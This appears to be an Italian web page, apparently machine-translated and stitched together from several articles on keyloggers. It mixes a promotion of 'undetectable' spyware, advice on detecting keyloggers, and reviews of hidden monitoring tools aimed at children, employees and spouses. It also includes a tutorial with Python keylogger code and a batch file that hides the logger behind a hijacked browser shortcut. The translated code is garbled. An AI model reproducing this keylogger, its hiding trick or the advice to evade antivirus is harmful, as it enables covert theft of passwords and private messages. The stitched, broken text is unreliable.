Programma spia per la tastiera. A cosa serve un keylogger? Altri mezzi di attacco

A cosa servono i keylogger (keylogger):
1. Controllo dei bambini e dei propri cari
Spyrix Keylogger Free ti consente di monitorare l'utilizzo del computer dei tuoi figli. Proteggerai i tuoi figli da informazioni indesiderate su Internet (sesso, droga, suicidio, gioco d'azzardo, ecc.) e impedirai il contatto con persone pericolose.
2. Controllo dei dipendenti e protezione da fughe di informazioni.
Spyrix Keylogger Free può essere utilizzato per monitorare la corrispondenza dei dipendenti sui computer di lavoro e controllare l'uso dell'orario di lavoro.
Caratteristiche principali di Spyrix Keylogger gratuito:

• NUOVO! Monitoraggio remoto tramite account web sicuroÈ sufficiente accedere una volta al computer che si desidera monitorare e installare lì il programma Spyrix Keylogger Free. In futuro, sarai in grado di visualizzare le informazioni raccolte tramite un account web da qualsiasi luogo con Internet e qualsiasi dispositivo (computer, laptop, tablet o smartphone).
• Registratore di tasti (registratore di tasti)Scrittura di informazioni sui tasti della tastiera premuti in un file di registro (salva anche i caratteri cancellati)
• 100% non rilevabile dai programmi antivirusLe applicazioni antivirus e antispyware spesso rilevano e bloccano molte di queste applicazioni. Spyrix Keylogger Free è perfettamente nascosto da programmi antivirus, anti-rootkit e software anti-spyware.
• Disinstallazione remotaPuoi disinstallare Spyrix Keylogger Free sul computer desiderato in remoto, tramite un account web.
• Monitoraggio dell'applicazioneVisualizza tutte le applicazioni in esecuzione, inclusi i giochi
• Screenshot (screenshot)L'acquisizione di schermate espande in modo significativo le capacità di monitoraggio del computer e consente di ottenere schermate di finestre di qualsiasi applicazione (inclusi ICQ, SKYPE, ecc.) E siti Web (ad esempio vkontakte, compagni di classe)
• Attività dell'utenteSpyrix Keylogger Free registrerà il tempo di attività e inattività dell'uso del computer
• Controllo disco rimovibile (USB, HDD, SD)
• Controllo della stampante

Spyrix Keylogger Free è il keylogger gratuito più potente sul mercato. Spyrix Keylogger Free è l'unico keylogger veramente gratuito che fornisce funzionalità di monitoraggio remoto.

Finestra principale:

Conto web sicuro:


Configurazione guidata:

Come cercare i keylogger

Per quanto complicati siano i keylogger, possono anche essere rilevati. Ci sono diversi modi.

• Cerca per firma

Questo metodo consente di determinare con precisione la presenza di keylogger, la scelta corretta delle firme può ridurre a zero la probabilità di errore. Ma uno scanner di firme è in grado di rilevare oggetti già conosciuti e descritti nel suo database, quindi questo richiede che il database sia grande e costantemente aggiornato.

• Algoritmi euristici

Questo metodo trova il keylogger in base alle sue caratteristiche e consente di rilevare trappole da tastiera standard. Gli studi hanno dimostrato che centinaia di programmi sicuri e non keylogger impostano trappole per tenere traccia dell'input del mouse e della tastiera. Ad esempio, il noto programma Punto Switcher, software di tastiere e mouse multimediali.

• API di monitoraggio utilizzate dalle spie

Il metodo si basa sull'intercettazione di una serie di funzioni utilizzate dai keylogger, come SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState.

Tracciare driver, processi, servizi utilizzati dal sistema

Il metodo è adatto non solo per il monitoraggio dei keylogger. Il modo più semplice per utilizzarlo è utilizzare un'applicazione come Kaspersky Inspector, che monitora l'aspetto dei nuovi file nel sistema.

Come proteggersi dai keylogger

Spesso al database sono già stati aggiunti keylogger noti e quindi il metodo di protezione è lo stesso di qualsiasi software dannoso:

• Installazione di un prodotto antivirus;
• Mantenere un database aggiornato.

Vale la pena notare che la maggior parte dei programmi antivirus classifica i keylogger come software potenzialmente pericoloso, e qui è necessario chiarire che nelle impostazioni predefinite il prodotto antivirus rileva la presenza di tali programmi. In caso contrario, vale la pena effettuare le impostazioni manualmente per proteggersi dallo spyware più comune.

In generale, poiché i keylogger hanno lo scopo di spiare dati riservati, dovresti ricorrere ai seguenti metodi di sicurezza:

Utilizzo di password monouso/autenticazione a due fattori

Utilizzo di sistemi di difesa proattivi che permette di avvisare l'utente dell'installazione/attivazione di software keylogger

Utilizzo della tastiera virtuale, che rappresenta la tastiera sullo schermo sotto forma di immagine, consente di proteggersi da spyware software e hardware.

Trova e rimuovi i keylogger

Quali sono i modi per proteggersi da questo spirito malvagio?

• Qualsiasi programma antivirus
• Utilità con meccanismi per la firma e la ricerca euristica (ad esempio AVZ).
• Utilità e programmi volti a rilevare i keylogger e bloccarne il lavoro. Questo metodo di protezione è il più efficace, poiché questo software blocca, di norma, quasi tutti i tipi di keylogger.

Da notare che il software finalizzato alla cattura dei keylogger ha due caratteristiche: software di questo tipo è per lo più a pagamento e la lingua russa è raramente presente.

Ad esempio, il software gratuito in inglese Advanced Spyware Remover - elimina adware, dialer, spyware, keylogger, ecc.

L'installazione è standard, dovresti fare clic su "Avanti", è difficile commettere errori. Dopo l'installazione, viene richiesto di eseguire il programma. Per eseguire la scansione, fai clic su "Scansiona ora".

Tuttavia, va notato che il programma non viene aggiornato da 3 anni.

In generale, questo programma controlla il registro di sistema per la presenza di chiavi malware al suo interno. L'utilità ha alcune funzionalità, consentendo così di visualizzare un elenco di programmi caricati all'avvio del sistema operativo ("HiJack Scan → Avvio"), visualizzare un elenco di servizi, mostrare porte attive, visualizzare i cookie di Internet Explorer, ecc. Dopo la scansione , apparirà una finestra simile:

Se presti attenzione a qualcosa di più fresco, puoi utilizzare Spyware Terminator 2012 (anche se non gratuitamente). L'utilità è in grado di rilevare e rimuovere quasi tutti i tipi di malware. Il sistema di sicurezza integrato attiva la protezione dell'applicazione e del sistema, monitora le utilità che interagiscono direttamente con la rete.

• intercettare gli appunti,
• intercettare le sequenze di tasti,
• intercettare il testo da windows

e altro ancora. Anti-keylogger non utilizza basi di firma, poiché si basa solo su algoritmi euristici. Anti-keylogger è in grado di proteggere da attacchi mirati, che sono molto pericolosi e popolari tra i criminali informatici. È particolarmente efficace nella lotta ai keylogger basati sull'uso di trap, polling ciclico e un driver di filtro della tastiera.

Anti-keylogger ha un'opzione gratuita, limitata dal tempo di utilizzo: 10 sessioni di lavoro, ciascuna per 2 ore, che è abbastanza per scansionare un PC alla volta.

Allora, cosa abbiamo:

1. I keylogger sono commercializzati come software legali, ma molti di essi possono essere utilizzati per rubare le informazioni personali degli utenti.
2. Oggi i keylogger, insieme al phishing e simili, sono diventati uno dei principali metodi di frode elettronica.
3. C'è stato un aumento del numero di programmi dannosi con funzionalità keylogger.
4. Distribuzione di software keylogger basati su tecnologie rootkit, che li rende invisibili all'utente e scanner antivirus.
5. Per rilevare il fatto di spionaggio con i keylogger, è necessario l'uso di mezzi di protezione specializzati.
6. La necessità di una protezione multilivello (prodotti antivirus con la funzione di rilevare software pericoloso, mezzi di protezione proattiva, tastiera virtuale).

Lascia il tuo commento!

Come fai a sapere cosa sta facendo tuo figlio o dipendente al computer? Quali siti visita, con chi comunica, cosa scrive a chi?

Per fare questo, ci sono spyware, un tipo speciale di software che raccoglie informazioni su tutte le sue azioni in modo impercettibile per l'utente. Uno spyware per il tuo computer farà al caso tuo.

Lo spyware per computer non va confuso con un trojan: il primo è assolutamente legittimo e si installa con il consenso dell'amministratore, il secondo si infiltra illegalmente nel PC e svolge attività dannose nascoste.

Tuttavia, i criminali informatici possono anche utilizzare programmi di tracciamento legittimi.

Le app spia sono spesso installate da dirigenti aziendali e amministratori di sistema per monitorare dipendenti, genitori per spiare bambini, coniugi gelosi, ecc. Allo stesso tempo, la "vittima" potrebbe sapere di essere monitorata, ma il più delle volte, lui non.

Revisione e confronto di cinque spyware popolari

NeoSpy

NeoSpy è uno spyware versatile per tastiera, schermo e attività dell'utente. NeoSpy funziona in modo invisibile e può nascondere la sua presenza durante l'installazione.

L'utente che installa il programma ha la possibilità di scegliere una delle due modalità di installazione: amministratore e nascosta. Nella prima modalità, il programma viene aperto: crea un collegamento sul desktop e una cartella nella directory Programmi, nella seconda è nascosto.

I processi del programma non vengono visualizzati in Task Manager di Windows e Task Manager di terze parti.

La funzionalità di NeoSpy è piuttosto ampia e il programma può essere utilizzato sia come tracciamento a casa che negli uffici per controllare i dipendenti.

Lo spyware è distribuito in tre versioni con una licenza shareware. Il prezzo è di 820-1990 rubli, ma può funzionare gratuitamente (anche in modalità nascosta) con restrizioni durante la visualizzazione dei rapporti.

Cosa può fare NeoSpy:

• monitorare la tastiera;
• monitorare le visite al sito web;
• mostrare lo schermo dell'utente in tempo reale via Internet da un altro computer o da un tablet;
• prendere screenshot dello schermo e salvare istantanee dalla webcam;
• monitorare gli eventi di sistema (accensione, spegnimento, inattività del computer, connessione a supporti rimovibili);
• intercettare il contenuto degli appunti;
• Monitora l'uso di messaggistica Internet, registra le chiamate Skype;
• intercettare i dati inviati per la stampa e copiati su supporti esterni;
• tenere statistiche di lavoro al computer;
• inviare le coordinate del laptop (calcolate tramite Wi-Fi).

Grazie all'interfaccia in lingua russa, un'ampia gamma di funzioni, una corretta intercettazione della tastiera e una modalità operativa completamente nascosta nel sistema, NeoSpy ottiene il punteggio massimo quando si sceglie programmi per il controllo dell'utente.

Monitor spia reale

La prossima spia è Real Spy Monitor. Questo programma in lingua inglese non ha solo funzioni di tracciamento, ma può anche bloccare determinate azioni sul computer. Pertanto, viene spesso utilizzato come strumento di controllo parentale.

Per ogni account nelle impostazioni di Real Spy Monitor, puoi creare la tua politica di divieto, ad esempio, di visitare determinati siti.

Sfortunatamente, a causa della mancanza di un'interfaccia in lingua inglese, è più difficile capire come funziona Real Spy Monitor, nonostante le miniature grafiche dei pulsanti.

Anche il programma è a pagamento. La licenza parte da $ 39,95.

Funzionalità del monitor spia reale:

• intercettazione di sequenze di tasti, contenuti di appunti, eventi di sistema, siti Web, messaggistica istantanea, posta;
• lavorare in modalità semi-nascosta (senza una finestra attiva, ma con la visualizzazione del processo nel task manager);
• lavorare con più account;
• avvio automatico selettivo per diversi account.

In generale, Real Spy Monitor piace a molti utenti, tra le carenze notano l'alto costo, la mancanza di un'interfaccia in lingua russa e la visualizzazione del processo nel task manager.

vera spia

Actual Spy è posizionato dagli sviluppatori come un keylogger (keylogger), sebbene il programma possa fare di più che registrare le sequenze di tasti.

Monitora il contenuto degli appunti, acquisisce schermate, monitora le visite al sito e così via, che fa parte del set principale di spie che abbiamo esaminato.

Una volta installato, Actual Spy crea un collegamento nel menu Start, in modo che possa essere notato dall'utente. Anche il lancio avviene apertamente: per nascondere la finestra del programma, è necessario premere determinati tasti.

Le possibilità di Actual Spy non sono molto diverse da quelle dei concorrenti. Tra le carenze, gli utenti hanno notato che registra correttamente le sequenze di tasti solo nel layout inglese.

SpyGo

SpyGo è un kit spia per uso domestico. Può essere utilizzato anche negli uffici per monitorare i dipendenti.

Per avviare il monitoraggio, basta premere il pulsante "Start" in SpyGo.

SpyGo è distribuito con una licenza shareware e costa 990-2990 rubli, a seconda del set di funzioni.

Nelle versioni di prova, la durata del monitoraggio è limitata a 20 minuti al giorno e l'invio di report via e-mail e tramite FTP non è disponibile.

Caratteristiche principali di SpyGo:

• monitoraggio delle sequenze di tasti;
• registrazione di tutte le azioni sul computer (lancio di programmi, operazioni con file, ecc.);
• controllo delle visite alle risorse web (cronologia, query di ricerca, siti visitati di frequente, durata della permanenza sul sito);
• registrare ciò che sta accadendo sullo schermo;
• salvare il contenuto degli appunti;
• ascoltare l'ambiente (se c'è un microfono);
• monitoraggio degli eventi di sistema (tempo di accensione e spegnimento del computer, downtime, connessione di unità flash, dischi, ecc.).

Importante! Gli svantaggi di SpyGo, secondo gli utenti, possono essere attribuiti al fatto che non supporta tutte le versioni di Windows, quando si inviano report, spesso genera errori ed è abbastanza facile da smascherare.

Infiltrato

Snitch - il nome di questo programma è tradotto come "snitch" e molto ostile nei confronti dell'utente. Spie spia sull'attività del computer. Funziona nascosto, non richiede impostazioni complesse e ha scarso effetto sulle prestazioni del sistema.

Il programma viene rilasciato in un'unica versione.

Funzionalità e caratteristiche del Boccino:

• monitoraggio della tastiera, degli appunti, degli eventi di sistema, della navigazione web e della comunicazione nei messenger;
• redazione di report riepilogativi e calendari degli eventi controllati;
• poco impegnativo per la configurazione di rete;
• protezione contro la terminazione non autorizzata del processo del programma;
• il monitoraggio viene effettuato anche in assenza di connessione di rete.

Tra le carenze, puoi vedere i conflitti con il software antivirus.

Come rilevare una spia su un computer?

Trovare spyware sul tuo computer che non si mostra all'esterno è difficile, ma possibile.

Quindi, nonostante la legittimità, le domande che abbiamo esaminato può riconoscere antivirus speciali,"Acuito" per la ricerca di spyware (Trojan con funzione di spionaggio), quindi consigliamo di aggiungere il programma installato all'elenco delle eccezioni per tali antivirus.

E se non hai bisogno di rimuovere la spia, ma hai solo bisogno di mascherare le tue azioni da essa, puoi utilizzare strumenti anti-spionaggio, che, nonostante la sorveglianza attiva di te, impediranno l'intercettazione di eventi da tastiera e schermate.

Quindi la tua corrispondenza e le tue password non cadranno nelle mani sbagliate.

Ciao, QUAZAR è di nuovo con te. Oggi ti mostrerò come creare un semplice keylogger Python. Naturalmente, questo keylogger non può competere con giganti come, ma nonostante ciò, può essere utilizzato.

Che cos'è un keylogger?

Puoi leggere di più su cos'è un keylogger e sui tipi di keylogger nell'articolo ““. Per trovare materiali aggiuntivi sull'argomento, utilizzare la ricerca nel sito, che si trova nell'angolo in alto a destra. Basta scrivere la parola "keylogger" o "keylogger".

Un semplice keylogger in Python

Per creare un keylogger, abbiamo bisogno di:

• Sistema operativo: Windows o MacOs (può essere utilizzato anche qualsiasi Linux, ma personalmente non l'ho provato)
• Python installato sulla macchina di destinazione e librerie speciali.

Questo materiale è solo a scopo informativo. Le informazioni presentate nell'articolo sono fornite solo a scopo informativo. Né gli editori del sito www.site, né l'autore della pubblicazione si assumono alcuna responsabilità per eventuali danni causati dal materiale di questo articolo.

Costruire un semplice keylogger in Python

Per prima cosa devi scaricare e installare Python.

Dopo aver installato Python, è necessario installare i moduli "pyHook" e "pywin32". Su questo sito troverai le versioni a 32 e 64 bit per Windows e altri sistemi operativi. Scarica "PYhook" e "pyWin32" in base alla versione di Python e Windows che hai installato (32 bit o 64 bit).

Una volta scaricato, installa e apri il menu IDLE (Python GUI) dal menu di avvio.

Vai al menu "File" e fai clic sulla voce "Nuovo file". Quindi incolla il codice del keylogger:

#Nome: QUAZAR
#Sito web: www.site
importa pyHook, pythoncom, sys, logging
file_log = "C: keyloggerlog.txt"
def OnKeyboardEvent (evento):
logging.basicConfig (nomefile = file_log, livello = logging.DEBUG, formato = "% (messaggio) s")
chr (evento.Ascii)
logging.log (10, chr (event.Ascii))
ritorna Vero
hooks_manager = pyHook.HookManager ()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()

E salvalo nominando il file Keylogger.pyw. Basta non salvare il file nella directory principale C: in cui sono necessari i diritti di amministratore per copiare ed eliminare i file. Crea una nuova cartella sul tuo disco C: o in un'altra posizione in cui non hai bisogno dei diritti di amministratore per copiare i file e salvare Keylogger.pyw lì.

Come file di output del report "file_log =" C: keyloggerlog.txt "puoi scegliere qualsiasi posizione, ma è meglio, ovviamente, un posto nascosto sul disco rigido. In questo esempio, salverò il file di report su disco nella directory C: root. Non ho nulla da nascondere.

Avvio automatico di un keylogger in Python

Il keylogger è pronto. Ora devi fare in modo che il keylogger venga eseguito nascosto all'utente e automaticamente all'avvio di Windows. Questo può essere fatto in diversi modi. Proviamo a farlo utilizzando un file bat legando l'avvio del keylogger a qualche programma o scrivendolo all'avvio.

Innanzitutto, crea un file bat. Copia e incolla il seguente codice nel blocco note:

:: Nome: QUAZAR
:: Sito web: www.site
@eco spento
start "" "C: keyloggerkeylogger.pyw"
start "" "C: Program FilesOperalauncher.exe"

Nella prima riga, devi inserire il percorso del file keylogger.pyw (nel mio caso, "C: keylogger.pyw"). Nella seconda riga, devi inserire il percorso del programma che l'utente utilizza solitamente (nel mio caso, il browser Opera).

Dopo la modifica, salva il file con l'estensione .bat (nel mio caso logger.bat) in un posto nascosto sul computer (nel mio caso in "C: keylogger.bat").

Ora andiamo sul desktop e selezioniamo il collegamento del programma utilizzato di frequente (nel mio caso, questo è il browser Opera). Con il tasto destro del mouse, apri il menu contestuale e vai alle proprietà del collegamento. Nel campo "Oggetto", inserisci il percorso del file bat del keylogger "C: keylogger.bat".

Dopo aver apportato le modifiche, cambierà anche l'icona del collegamento. Ma questo può essere facilmente risolto nella scheda delle proprietà (vedi la schermata sopra).

Registratore di tastiè un programma che legge i tasti premuti e li salva in un file. In futuro, potrai vedere cosa ha scritto la persona al computer, quali messaggi ha digitato e quali password ha inserito. Un altro nome per keylogger è keylogger, dall'inglese "keylogger", che letteralmente significa "pulsanti di registrazione".

Nel programma NeoSpy, la funzione keylogger è abilitata per impostazione predefinita, in questa modalità il programma registra testo, combinazioni di tasti di scelta rapida e password digitate sulla tastiera. Le impostazioni del keylogger sono gestite nel menu "Impostazioni di monitoraggio" - "Registrazione del registro" - "Tastiera". Puoi scegliere una delle due modalità di funzionamento del programma: standard e alternativa. Si consiglia di utilizzare l'opzione standard nel 99% dei casi, ma in caso di conflitto con il software antivirus, è possibile abilitare la modalità alternativa.

Configurazione del keylogger

Il registro della tastiera è sempre scritto in formato completo, comprese le chiavi di servizio. Un esempio di tale registro può essere visto nell'illustrazione. Durante la visualizzazione del report, è possibile disattivare la visualizzazione dei caratteri non stampabili e visualizzare il registro come testo normale, più leggibile.

Per semplificare il lavoro con i report, le password digitate sono evidenziate nell'elenco dei tasti premuti. Pertanto, puoi scoprire le password di tuo figlio e, se necessario, proteggerlo da conoscenze indesiderate. Se il programma NeoSpy viene utilizzato nell'azienda per controllare i dipendenti, la raccolta di dati personali e corrispondenza è vietata dalla legislazione della maggior parte dei paesi, pertanto questa opzione deve essere disabilitata o il dipendente deve essere informato per iscritto del controllo da parte del gestione e l'inammissibilità dell'uso di un computer nell'organizzazione per la corrispondenza personale.